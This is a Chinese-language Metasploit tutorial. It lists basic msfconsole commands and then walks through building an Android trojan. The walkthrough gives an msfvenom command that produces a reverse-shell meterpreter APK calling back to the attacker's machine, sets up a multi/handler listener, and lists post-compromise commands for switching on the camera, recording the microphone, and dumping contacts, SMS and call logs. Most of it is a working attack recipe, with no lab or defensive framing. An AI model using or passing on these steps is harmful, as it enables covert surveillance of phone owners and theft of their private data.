一、metasploit基礎命令
1、banner命令是查看metasploit的版本
2、help命令,是顯示幫助信息
3、exit命令,退出msfconsole
4、color命令,修改顏色
5、load命令是載入插件
6、set設置命令
7、search命令是搜索,例我們搜索ms08漏洞
8、show options列出某個滲透攻擊或模塊中所有的配置參數。
9、LHOST你本地可以讓目標主機連接的IP地址,通常當目標主機不在同一個局域網內時,就需要是一個公共IP地址,特別為反彈式shell使用。RHOST遠程主機或是目標主機。
10、exploit執行滲透攻擊或模塊來攻擊目標。輸入exploit后,點擊回車,就開始攻擊了。
二、示例( 生成木馬侵入手機 ):
1.打開終端提示符下輸入以下命令,使用msfvenom工具來創建有效載荷APK文件(生成apk木馬程序)。
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 > /root/apk.apk #生成apk木馬,設置本機ip與自定義端口
然后啟動msf:
msfconsole
1.use exploit/multi/handler //加載模塊 2. set payload android/meterpreter/reverse_tcp //選擇Payload 3.show options //查看參數設置 這個payload里邊有兩個參數要設置 LHOST和LPORT 表示地址和端口 默認的端口是4444 現在我們來更改設置 1.set LHOST 172.23.0.209 //這里的地址設置成我們剛才生成木馬的IP地址 2.set LPORT 5555 //這里的端口設置成剛才我們生成木馬所監聽的端口 3.exploit //開始執行漏洞 開始監聽,等待手機上線
目標上線成功示例(當目標上線成功后,會回顯出命令行):
2. 控制androiud的命令:
sysinfo //查看手機信息
webcam_list //列出網絡攝像頭
webcam_stream //開啟攝像頭
webcam_snap //從指定的攝像頭獲取快照
webcam_chat //開始視頻聊天
dump_contacts //導出電話號碼
dump_sms //導出信息
record_mic [ˈrekərd] /記錄/ 從默認麥克風錄制音頻為X秒
check_root //檢查設備是否有根
dump_calllog //獲取調用日志
dump_contacts //獲取聯系人列表
dump_sms //獲取短信
? //查看更多命令